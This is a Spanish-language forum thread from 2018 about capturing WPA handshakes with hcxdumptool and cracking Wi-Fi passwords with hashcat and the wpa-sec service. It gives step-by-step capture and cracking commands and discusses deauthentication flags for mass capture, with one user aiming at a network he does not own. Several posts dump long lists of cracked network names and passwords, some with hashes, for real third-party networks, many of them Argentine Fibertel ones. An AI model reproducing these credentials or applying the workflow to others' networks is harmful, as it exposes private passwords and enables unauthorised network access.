Arg-Wireless - El Primer Foro de Wireless de Argentina...

Seguridad Informática => Hacking Wireless => Mensaje iniciado por: diego10 en 07 de Marzo de 2018, 08:26:31 pm

Título: hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 07 de Marzo de 2018, 08:26:31 pm
Subject: hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing

Conjunto de herramientas creadas por ZerBea

https://github.com/ZerBea

A- Primeros Pasos:

A1. Poner la placa wifi en modo monitor
hcxtools-master/usefullscripts/makemonnb

A2. Captura del archivo (ver hcxdumptool -h)

hcxdumptool -i <tuplaca> -o hcxdumptool.pcap -t 5 -s

- dejar trabajar el sistema como minimo un par de horas -

A3. Bajar un buen diccionario ejemplo: C-nets
https://wpa-sec.stanev.org/?dicts

o directamente: https://wpa-sec.stanev.org/dict/cracked.txt.gz

A4. Pasar al .pcap obtenido (ver punto A2 y hcxpcaptool -h)

hcxpcaptool -o output.hccapx -E testlist -I identitylist -U unsortedusername -P plainmasterkey -X rawhccap *.pcap

A5. Desde hashcat lo siguiente: (o adaptarlo a la necesidad de cada uno)

hashcat -a 0 -m 2500 --nonce-error-corrections=0 --remove --logfile-disable --potfile-path=hashcat.2500.pot <direccion a> output.hccapx <direccion a> C-nets

PD: Este documento fue escrito en muestra de mi enorme agradecimiento al grandioso ZeroBeat!

Argentina, 7 de marzo de 2018






 
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: Tomasuno en 07 de Marzo de 2018, 10:45:25 pm
Una consulta media tonta, que es lo que hace tan bueno o eficiente eso? O que hace eso que no lo haga airodump + hashcat? Disculpa la consulta. Saludos
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 08 de Marzo de 2018, 07:41:21 am
http://www.youtube.com/watch?v=J3p7nGLTSGw


Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 11 de Marzo de 2018, 03:21:06 pm
But we need also much more contributers/submitters running this steps:


----------------------------------------------------------------------------------------------------------------------
One of the major problems is to find a good wordlist and to filter out the garbage from that wordlist.

For that purpose you can try hashcat in combination with the new python client from
https://wpa-sec.stanev.org
and a wordlist of your choice (for example from here: https://github.com/berzerk0/Probable-Wordlists)

1. step
do a git clone from latest dwpa: git clone https://github.com/RealEnder/dwpa

2. step
create a directory and copy help_crack.py and "yourwordlist" into this folder

3. step (this will take a while...)
run help_crack.py either with this option:
./help_crack.py -pot potfile.2500 -ad yourwordlist

or run help_crack.py with this option:
./help_crack.py -pot potfile.2500 -cd yourwordlist

difference between -cd and -ad is:
-cd test only yourwordlist
-ad test yourwordlist and one common wordlist from wpa-sec

you will retrieve confirmed and real(!) passwords in this files:
cracked.txt (only the passwords, no longer readable by common text editors since this list contains non ASCII/UTF
characters, hashcat can handle this as input)
potfile.2500 (complete hashcat pot data: hashcat_md64:mac_ap:mac_sta:ESSID:password)
rkg.txt (additionally retrieved passwords from a default key generator)

In parallel, you can upload your cap file (hcxdumptool, wlandump-ng, airodump-ng, besside-ng, wireshark, tcpdump,
kismet) to wpa-sec (via web interface or using wlancap2wpasec). In that case, your captured handshakes are tested, too
against this wordlists. You will retrieve the results also in potfile.2500 and the passwords in cracked.txt, immediately.

4. step
Delete yourwordlist and try another one.
You will see, that your confirmed password lists (potfile.2500, cracked.txt) will increase, soon, containing real(!)
passwords.

(https://i.imgur.com/82f1VbH.jpg)
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 12 de Marzo de 2018, 08:11:36 am
added some improvements to wlancap2wpasec
Now, you can add your personal key to link the results to your ID.

$ wlancap2wpasec -h
wlancap2wpasec 4.1.0 (C) 2018 ZeroBeat
usage: wlancap2wpasec <options> [input.cap] [input.cap] ...
wlancap2wpasec <options> *.cap
wlancap2wpasec <options> *.*

options:
-k <key> : wpa-sec user key
-t <seconds> : set connection timeout (default 30 seconds)
-R : remove cap if upload was successfull
-h : this help

(https://i.imgur.com/AXEWbv1.jpg)
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 24 de Marzo de 2018, 02:02:19 pm
http://www.youtube.com/watch?v=iBdB-S919bI
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 24 de Marzo de 2018, 09:04:36 pm
de ultima te queda subir gratis los .cap a https://wpa-sec.stanev.org

http://www.youtube.com/watch?v=I5KHXR8dbkg

que ellos lo intenten por vos y....


http://www.youtube.com/watch?v=_5XJcwUrSDY
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: coolerking en 28 de Marzo de 2018, 02:54:44 pm
Hola diego10! Muchisimas gracias por el tutorial, te hago una consulta nuevamente. Al correr el hashcat me tira lo siguiente:
Código: [Seleccionar]
root@kali:~# hashcat -a 0 -m 2500 --nonce-error-corrections=0 --remove --logfile-disable --potfile-path=hashcat.2500.pot output.hccapx cracked1.txt 
hashcat (v4.0.1) starting...

* Device #1: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
No devices found/left.
Lo google y sugieren usar el --force flag, pero no se si con eso estoy solucionando el problema, que no descubro cual es.

Muchas gracias!
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 28 de Marzo de 2018, 05:28:11 pm
parece que el --force lo arregla
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: HadesSama en 29 de Marzo de 2018, 02:10:21 am
esto se podria compilar en una sola herramienta? :) xD
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 01 de Abril de 2018, 04:50:18 pm
estuve con el padre de Papa Noel en https://wpa-sec.stanev.org
trajo regalos para propios y extraños! fijate si encontras el tuyo!!!

zaidosama:zaid1975
erguvenco:erguvenco123
dd-wrt:kazna2011
AndroidAP:kippy100
netis:hjvfirf2016
iPhone:Emma1994
PTCL-BB:ABDULLAH1234
Tenda:Mahasamatman
linksys:leidedri
WLAN-B56A22:2926552560895354
TP-Link_E42A:76113529
TP-LINK_6388:13117405
muslimat-27:muslimat1984
home:lascarica123
Tenda:veronika2013
HOME:khongcowifi
netis:winston777
Netcore:HXS1991714
D-Link:roberto1968
dlink:TestingTesting123
linksys:geoman111
Fibertel WiFi299:0149503052
Fibertel WiFi 162:0143783749
Fibertel WiFi270 2.4GHz:0043314508
Fibertel WiFi190 2.4GHz:0043810371
Fibertel WiFi321 2.4GHz:0043512547
NETGEAR:LEENALUV
iPhone:flavius23
linksys:mobbin77
iPhone:hellogeeta
Fibertel WiFi609:004384936
Fibertel WiFi643 2.4GHz:004223915
Fibertel WiFi:4206720045
Fibertel WiFi:4205315912
Fibertel WiFi180:4207959969
Fibertel WiFi634:4205788743
Fibertel WiFi167:4207939788
Fibertel WiFi618:4208038512
Fibertel WiFi519:4207812156
101:cjpthwfybt!33
AndroidAP:lovebugs
DIR-300NRU:virtuspro
FRITZ!Box Fon WLAN 7270:zaloguj123
X:123456789
nata:555111222
NETGEAR:yfcntymrf
TP-LINK:druiding
Rostelecom4:07061989
Kyivstar_5420:54577411
HUAWEI-Turcanu:44445555
vamher:20011982
TP-Link_16D0:38211966
TP-LINK_7354:64562803
Vika_WiFi:19465616
WLAN-837188:1836120867124639
dd-wrt:n77900388
AndroidAP:assr2523

http://www.youtube.com/watch?v=GbneiJdmHwc
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: HadesSama en 02 de Abril de 2018, 12:14:39 am
Dieguito podrias hacer un tutorial para los  noobs como yo sobre esto??'
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 02 de Abril de 2018, 06:13:30 pm
ya esta hecho  ;)
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 04 de Abril de 2018, 08:27:57 pm
f973340b31abf7c2ef94f82f2e5c1f4f197a7acd9aba8cd21857631ce63ae1ce:AndroidAP:30964992
ed8519ef0af51cf87687c743daf53aa22808d6b6aa13e48b89b0bdd0f3520017:AndroidAP:88nigga88
b7c2965534adfa30ca8eb7937295d3fc99dbcfe21068a2cfd7fde4c644d1151f:AndroidAP:aaoh3396
be6271b49973b57967647d7a8250c5494c6bcf265fd8f0a72f2d3d261289edbc:AndroidAP:aaup5098
a9cff9f3c7ac78e6f2af6058cd3dc7c00f213a9e3bde697e17538b6e3cbe2ddc:AndroidAP:addo1123
3d0eaa71673ed949ad813568b82a3b733e34b31968d11ceff392683879f45373:AndroidAP:akgb3986
e5aba76a8577158fd7ce8097bac9081565bfc1f1acfffdc227390c192b8fec0c:AndroidAP:assr2523
18bba9594a593d6e17c102a598ebca93074a26a62e3a1466757df89490089113:AndroidAP:attv7240
756e38ae1e6ffd864d9a84191ff6575677dbe4b00fe3037cf26e828c9307ff08:AndroidAP:azjq4081
5b534850b1325ce9f31f09b5eb66315a5d3840ae7080736e8b99c1e1beb68e45:AndroidAP:bfwz5472
5158b65d187344d4abc525398e52cf378c1e43b7bb41093729700f3af3237623:AndroidAP:bmsn7519
857beac5943c25d4a13025ca3b42aa7265b27a45fbe495d6ac17fbc2c724b975:AndroidAP:cama6500
290281a63cafd3080d71b5468597d0e3626e1f11c988f08959d3cebb05e682a4:AndroidAP:cfjk9844
ade7a8192d7272c20fdb0df190253ff39a90353770bb2ae06db7c150229a7a7c:AndroidAP:cooi1494
f615a2fbaf3d3b8cb8f11bf92526f81678d482bb37b4291312e04b8436496e47:AndroidAP:cxai3650
0eb033adc3e06a772dfa7ccc721d7f2f3f893c8eb3d4a13d9069b188d49d2809:AndroidAP:dkgb6288
07d5702ab689aee1705d64fba8d4c232b88f02f5841eccb1d8f53199119a1a11:AndroidAP:dman3795
e4bc9afa66d6417ab427daf5c47b55ee6e22d179faee07b40b62117dd498b563:AndroidAP:dwlm2982
3fd65ccdb0e25500848d18b088479aa6cb5d3210c62e7866bae3cbda6cf0b735:AndroidAP:egpb9783
8f60b6516f59a9d5d86ce165843bb3e102a6ae987a17c674072347feb877b6d1:AndroidAP:eosu3404
a0c42883121698d0654a9a0126e0df0023a278d1a161c90147f23eeb860270dd:AndroidAP:eyzt5608
d40bc3528e7d6e459dcd78bb9f0732ec6ad12a511e08a6d85df00e0bc1793ed8:AndroidAP:fumu6168
ff3478d87f2260413b7e41537cf340960f5fa77b2ad28b9e98ebac22b2cb1361:AndroidAP:fzre9799
4a6fcd2e3edbc97f0984a48affee8a749655ea5ac7996ef0d730ea5e8365eebd:AndroidAP:gskf5025
5d0d8487d979aaaca9ca5a49f1257a4d8a148d0053efdd335e92b909bfcbd478:AndroidAP:hapa0507
e2e9ed45574d354f69c27776396e8d7ed23c21946c360b7c0b4a9222d6bc82c9:AndroidAP:hcrh5086
ebafdf152019fd6e88dc1f658a849b22106aaf94abaf6dbabfb6214a27656d5d:AndroidAP:hhbk3829
5182e8dcddaabaf7f780ee4eb508579b114764d109931d110d3b59a5b16e25ea:AndroidAP:hkhm5589
09819fa3e5e09a4eee60f9bb081199efd481647a030cb138c21a10b357429133:AndroidAP:hsao8748
a110b823398a9776fbb9ef85c6102348fe6f075b40937018afd4282bbe9a4356:AndroidAP:htox5251
bcc345bed37a788a5b9a46014554aac0f18a9faa28270de2aa607babb2201ba4:AndroidAP:ifam2663
ec40ac9792141acbbe2fac24798475bb29b9b03f2d3c400393b45470e51a3a29:AndroidAP:igjd8764
7d1de7f8bc74b29f2691ec553b405120f8c9f0bb8cd1485c08631d8edcf4a8be:AndroidAP:iuwn1183
1cc77a33aefd73f54714b14d5971eab7c536682fbcc02d0728e83aa3ea4b42a4:AndroidAP:jdpg1251
4e7ec92dff4fde33d88368096f0c1083749938806c60d37cf10bbd0bcc1abac1:AndroidAP:jegd0715
065e27ef496f2ee87d724213cbd6e7211b387b1850d8515cccd836beda00830a:AndroidAP:jhsc8959
6aad252ef257232638f815007576f16396a9cad1a726d37ad4b8d9a25b3bbdaf:AndroidAP:jnvo0978
d58b56b142528a5646bf2336cc266134e7e7b9478167afa079873008d06f34fc:AndroidAP:jtjh2544
0704225ce87d3f59fbf42b26b5f70b8834e79425f465f4f2740aa93c626b8de8:AndroidAP:jtqm3742
31739f61a3e52762eea2ff889080706423c2e03b7eb723b420bd4334592cb9ba:AndroidAP:juct3753
6f439ae505d493472fb6ffcade4d21a6ecedcaaab88c017ea6669eea02d908f1:AndroidAP:kjqi8078
ff68b5fed52ed3b92b50d482733ecc18450dde5476824ac0495d220c17b75f7f:AndroidAP:koir7596
df622a3ddf75dbb3a72840cf1cc34880025c2531320cbbf6de4794b273cdb100:AndroidAP:ksta7549
a962f16f201eb95fad8d9057f9085052bf5ddee2eda0194342a67f1db341d070:AndroidAP:kvpl1803
f7fefbe14a80d782e62874ff444202af8d6f04d48e22db1e900ab14368903fb0:AndroidAP:kvsg0375
fa1861475932fe74ce26c93b642feb7825ac4ea346dbc91ce587c8e7e7fc9447:AndroidAP:ledh6022
e2a2130d288826fb77ea27794e8f009053a46a6ab25faf267143c770d0710e9a:AndroidAP:lhyx2365
7b8ccfd72901c970f7ae29faa8ac5cbfbd3b53cee3918e17ee5c96176661cc2f:AndroidAP:ltyu3872
c4bd50522ae4bff82a964ca632bab6f0e906fdf314e10f7717901414bbcbdff6:AndroidAP:mosj5216
636180937cab2802a48113259ac7c92e7ba598b12d662e628c0361e09eb2e312:AndroidAP:mqrg1994
2d4b8a785abaf81e7061940b19a4a45181c32fe41817f3f9d833424c5b45dbd3:AndroidAP:mrip5077
6a0623d3a7f8eba8b3dd25a90571143a17ff2dbd8b52f7ad8eef9e8b78f3ba56:AndroidAP:muki6761
29927f6e1fbae760262d395de21f89a8ea2feffea9365244eeaf6246183cb2ce:AndroidAP:nevf5887
311f02ae2087a71351cc79c830bbc6ee518b59e83c87ebe4adc69838c34c27dd:AndroidAP:nlav9747
6df1230abec1b3c8aaa32714cf45b26691ca6db96fc54f880cae0c9237ee6273:AndroidAP:nuqj8009
7899761fdaf6897bc96cc0cf7025badd37bfee78eddb9293da68af957f15b8d2:AndroidAP:nxjj8631
903b7e091a4c63ace86bff845b97102df6dd0afd21b6a10153e57156eaf787a8:AndroidAP:nyae1656
6c0d9878c730ed6dd173cafc6624ee2b7f455bbfdc343fd7edba02b6dba70269:AndroidAP:oacn5106
e18f745f34e0c56eb23468b8a3aecefd4cd30f3e9c7607c2549bb92e68c0e4c8:AndroidAP:oazb3553
d771954e1039b266fbe41c0e399c9eb99653d63aad610c51ca674a1a2a581c5f:AndroidAP:ohgs7367
9d89c12a8551f0f5d718b112ff4a617d9e82c71d68a4527595265107fc61bbbd:AndroidAP:oirb5566
b9176a42e7dd0c5fa124340d016d984a8892568a69c1bf49614e1b80bcfc9c17:AndroidAP:oqlq4512
cae1e59c38fc30c845e1a53569eba02d3d149d44861f7953f3f380f19786b3ba:AndroidAP:pegp3534
6a67d87a31fe3dd6ac7139b07c2b90e19cdfb88bcb6392cf8209f616a1bd7128:AndroidAP:plvt7544
2cd852117e02b6e1427c5c23c7f976bf186863659219efe8802a3f2547e2c742:AndroidAP:qane9592
b4be1b4b31c81de97dac92f2ea0cc0f63a69f6a035e812ef8cda678516118294:AndroidAP:qgfq6784
412902390aab6b77630e6345a96a1dc515a2c1951a0cd9321e4834426da5f7c4:AndroidAP:qiul1922
c8dddf0a97f81dd15ca485b562162230c24cbfaa9faae69104c9d54afaa18956:AndroidAP:qkbt4619
4da42e5824bbc6452a73819f8cb5b4be60debdefae7d3576bd36cd0f9cf61156:AndroidAP:qqsb2471
309fb108e292dd5c18fe18d2f6f1464381e7e6b7d4afe825d503cb1e41a4f207:AndroidAP:qseh5546
3f1c75253a51d427c3382d568812af15ac991ffce1e2c3a3cd28c58e8379e6e7:AndroidAP:qwerty098123
be638c654d18f83db2184e915e91fc3de4d02b6cdcd719dca43918fbd3f2b188:AndroidAP:qyjo9010
fdd0e40f3902e12a14fe24891a6951fa4a584f85e83fcab423f9cf5578ad4206:AndroidAP:rjqx8790
f0745ad17028843789a1051fa80e05ab740f2002c58abe00056f7b62ed97270b:AndroidAP:rtrd9609
3c25888ea1664c804be0bddccf116c2e0d1f25e4355a1ceab724eb15c56cdeca:AndroidAP:rvys8829
36a64dbf4fd54025234b3a7df56f15f957c486244d3e3dd3419d7bc2dd08d5a8:AndroidAP:scnt0612
03cdad0443fcb2f2a6e75c0fdab62f1448df851e3504d54f01f5541ee336a343:AndroidAP:sldv1614
6794486d78a7d6ca4ea4bec8703c69c602cca326585abe869bf86755da70a12a:AndroidAP:sngc4483
65bb7eda57c10da0016d884d1cc5eb59ea0f2fec0e7d2a55edda9876a8a2993e:AndroidAP:snxg0089
2d16ecd219f2be1f5d31d902dbc5e344033393f5e7bc9ffefe4fc94f80d36c94:AndroidAP:squo1052
b1bfd3b34f9942fcf33bfadb33ccf15d8686ddb6246307d90c8e2efbb740a618:AndroidAP:swry9901
48c6c9d0ee70d4ae7cc2e49d6b003490ddf4c1996ee61cb9ddbbe0b1f9353adf:AndroidAP:sylv6216
4a29c2fe657385b94ef7ff14d11d6f6daf82e98ac9d8255a6d42d9801c231891:AndroidAP:tcdr3466
781c4cdf2e5ac6278245536f824826c1839b5149becf0d7da1a0ea58ae3a5695:AndroidAP:tezp9719
29bc085bea272e706c71ee6bde1f2b57ac28c9a57a204a9b94dd1cce1609feb9:AndroidAP:tkqk9141
3c6d98e537135a41f0e6789ddea4b3a6e441fd8f01f997860c8837c6d3529de0:AndroidAP:tllk1540
71e92940116d3388ae701c5c3eabff9b654d12837cc2e614ab14236a45e657ae:AndroidAP:tsad3011
2bbeead4d27b9c5db3611017a1c2eb9b3d1ac05843fa8360e6b01a8e78bc940d:AndroidAP:upkd2366
06104cb048c91d6853badafe9633a13888174aa9ea9cd72eb1c15b6c74e73df5:AndroidAP:uqiv3880
69990bee19f0a04e3acfa8fd526df223a570bf07ce1b236d11104d075ee236de:AndroidAP:utwj7972
9654c0d469c74cfe8bdf448e9e4b66a35a27eddf677a5b291b2c847e667b12be:AndroidAP:vabu7033
972c6e707b837869a8db801c78e4c1fd2645588f66f690b92447b303097795b7:AndroidAP:valentin70
bc68b9a2d5b6bfbf235a17f54ca00a0fe5b4512a2f5bc5da244438ade9179826:AndroidAP:vano7777
4f436d291ddf8b55f33b2e884964ee4aca61364edb086e745ba2e1f4d50ae216:AndroidAP:vijf9900
d645085a81082d2df004a68bff597100e8ad5d234ab5db750695609ee3cf85d4:AndroidAP:vioo8620
774dbb6dc6043063c5f2837b3c93730e08888c33a5f73b3e84d8bb07ab817c91:AndroidAP:voxo5188
c266adcb4d134a6dd4872351c95477a7399bf6c455752756d3199bbbfab38946:AndroidAP:vreh4878
52beeb7092c4d809d6697e72597cd049927e6cb3f45d65d4d8b1666840b5415d:AndroidAP:vrjf2024
8bb808df783202c7f68a64207a57179baf3cdc94a78e97ce95c2e66e61026f2d:AndroidAP:vvfp5150
eb39696ef8e3025d585a8b2ed93a5ea19b57c77f4096ca15c86838218b1e4438:AndroidAP:wgld8866
410fdf9f2a3a47bfd2b321cf79adcaf55f2bdfb7cc909f15bd5555269d24ddef:AndroidAP:wixj0474
6e09b405454666b8510b4966fe0b676f47c4dacd48b6702495fe4eba8daaa43b:AndroidAP:wzpx7072
fb7967447de3b15291ae066685fef12bdfe86f59943067eeec06b54670877851:AndroidAP:xlkz4476
7dafdcc299594050f9d5384efc5361ebc72a71f5d24bb62b5635ee7701968a68:AndroidAP:xqxl7252
97883276caf2c354b82e667d3fb2b6a22950fc9e28e75e0d2ab55bc18b02b669:AndroidAP:xzlh9952
80f9458628f1ed39e96984617f00df8a77970077fd8e1762f311f0fb72d67afc:AndroidAP:yycv4478

https://wpa-sec.stanev.org

http://www.youtube.com/watch?v=D2Kl-F85gMo
e36acfa32f2e06f10f04cc886e26149649678fcefe1ba30ec68f67f6fd404be2:AndroidAP:lovebugs
ca6e91e883e6230205a33154e23273a73a4586af2032de12654fbbbeb059813c:AndroidAP:pablito10
fcb8ebfa6e855fb6722e8c545dd5dc007c92d6a2e34622df38354b40161d1308:AndroidAP:respublica2016
cd6f735995f1f7080d144aeddff5fd33789bdc118587a732ee5e722c72e44c44:AndroidAP:toshiba9!


Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: negrot en 06 de Abril de 2018, 09:43:11 am
Una consulta , después del escaneo y capturas de handshakes, me devuelve al detener el proceso  el archivo *.pcap (que los contiene ) pero al querer subirlo a https://wpa-sec.stanev.org me dice que no acepta los .pcap (solo .cap) . Quería si los convierten? al cambiar la extensión solamente de pcap a cap me subió de una todos los handshakes pero no se si esta bien
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 06 de Abril de 2018, 11:40:12 am
si esta bien, simplemente renombralos
y con tu key vas viendo los resultados
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 06 de Abril de 2018, 03:34:58 pm
http://www.youtube.com/watch?v=IIyjwjN9bts
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: negrot en 07 de Abril de 2018, 07:46:50 am
Aclaro soy muy malo en linux, agradezco la ayuda a ver que estoy fallando.
expongo mis pasos ,todo desde kali linux, instalado en maquina virtual :
1 hice git clone e instale hcxtool y hcxdumptool.
2 pongo la placa en modo monitor
3 obtengo el *.pcap (contenedor de los handshake despues de horas/días)
----Hasta aca no tuve problemas , pude despues convertir el *.pcap y subirlo a wpa-sec.stanev.org )
quisiera poder seguir los pasos tambien en mi pc
4 bajo diccionarios
5 hcxpcaptool (( me  devuelve ..bash: hcxpcaptool : no se encontró la orden))....

Puede ser que me falte esa herramienta? o cual podria ser el problema?
Gracias
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: diego10 en 07 de Abril de 2018, 12:16:51 pm
Código: [Seleccionar]
Last login: Sat Apr  7 11:24:32 on ttys001
iMac171:~ diego10$ hcxpcaptool -h
hcxpcaptool 4.1.5 (C) 2018 ZeroBeat

se instala en linux bajo ciertos requerimientos y librerias
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: negrot en 05 de Mayo de 2018, 03:40:33 pm
Código: [Seleccionar]
Last login: Sat Apr  7 11:24:32 on ttys001
iMac171:~ diego10$ hcxpcaptool -h
hcxpcaptool 4.1.5 (C) 2018 ZeroBeat

se instala en linux bajo ciertos requerimientos y librerias

Diego , te puedo hacer un par de preguntas ya que si logro capturar los handshakes mediante este método , pero no puedo instalar el resto de las herramientas , se ve que me falta alguna dependencia o algo y no logro dar con que para instalarlas....

Te pregunto ..Que distro de linux usas? Lo haces desde maquina virtual o instalada directamente en pc? tuviste algún problema en instalar alguna herramienta o algún paso a seguir que recuerdes para hacerlo , creo que mi problema tanto en wifislax , ubuntu y kali (todos los últimos intente , en maquina virtual , es la dependencia libcap( que es requerimiento según la explicación de ZerBea) pero como se nada de Linux no logro instalarla. Hay alguna distro que ya venga con todas las dependencias instaladas o compiladas?.. Bueno gracias y disculpa la molestia!!
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: coolerking en 02 de Julio de 2018, 08:22:07 pm
Fijate con:

Código: [Seleccionar]
apt-get install libpcap-dev libcurl4-openssl-dev libssl-dev
sudo apt-get install zlib1g-dev libncurses5-dev
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: ManuelTWZ en 06 de Julio de 2018, 02:30:07 am
Hola a todo lo que participan de este tema. Yo llegue a esta pagina por este tema, y la verdad que me costo mucho llegar al punto de compilar el programa y hacer las capturas, hasta entonces me manejaba con airodump que me resultaba mas rapido y comodo.
Mi pregunta es la siguiente, no se si es media idiota o que, una ves tengo el cap con todas los handshaker posible, luego de horas y horas de captura, esta se pueden dividir?  Osea de que si tengo un cao con 2 handshaker de 20 Speddy diferentes, puedo dividirlos en 20 cap?
Es que en concreto hay una señal muy buena que me llega, pero me es imposible capturarla con airodump, nunca hay clientes. Quiero dejar el programa andando todo el dia, y seguramente capturara muchos, pero me interesa luego filtrar/dividir el cap de la red que me interesa para subirlo al tema de Speedy, y también para poder analisar cap por cap en wireshark para ver si tiene los 4 eapol. Gracias y perdonen mi ignorancia.

Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: ManuelTWZ en 06 de Julio de 2018, 02:41:56 am
Se me olvido preguntar otro asunto, veía que se podía forzar la captura del handshake con las opciones de:

-D             : enable deauthentications
-d             : enable disassociations

Es esta opción muy agresiva y poco recomendable de usar cuando se hace este tipo de ataque en masa?? Es mejor usarlas limitando el ataque a un solo canal? Es mejor olvidarse de esta opciones?? Lo digo porque yo imprudentemente la estoy usando sin saberlo, pero bueno ya me dirán.
Lo estoy haciendo desde wifislax usando los siguientes comandos:

 sudo wlandump-ng -i mon0 -o capturacanal6 -c 6 -t 160 -D -d -s -E 1

Desde ya mucha gracias. Saludos
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: negrot en 08 de Julio de 2018, 09:37:14 pm
YO no puedo ayudarte , soy medio queso con linux y solo logre hacer las capturas bien dejando capturara horas/dias ....pero no logro (no entendi bien lo de hacer los diccionarios al vuelo y como pasarlos)) ... Lo que si el archivo de captura ((que contiene todos los handshakes )) con solamente renombrar la extension""pcap"" a .cap y subirlos a wpa-sec.stanev.org ahi mismo ya te los sube todos individualmente((y te van dando las claves por separado de los que van obteniendo)) por si te sirve....
Si llegas a saber como Hacer los pasos que se comentan aca ..A3 , A4 y A5 y me orientas te lo agradeceria..
Título: Re:hcxtools - hcxkeys - hcxdumptool - hcxdumptool_bleeding_testing
Publicado por: Fitap en 09 de Julio de 2018, 10:05:42 pm
Hacia rato que no entraba por estos lados.

Diego, que diccionario estas usando?

Saludos.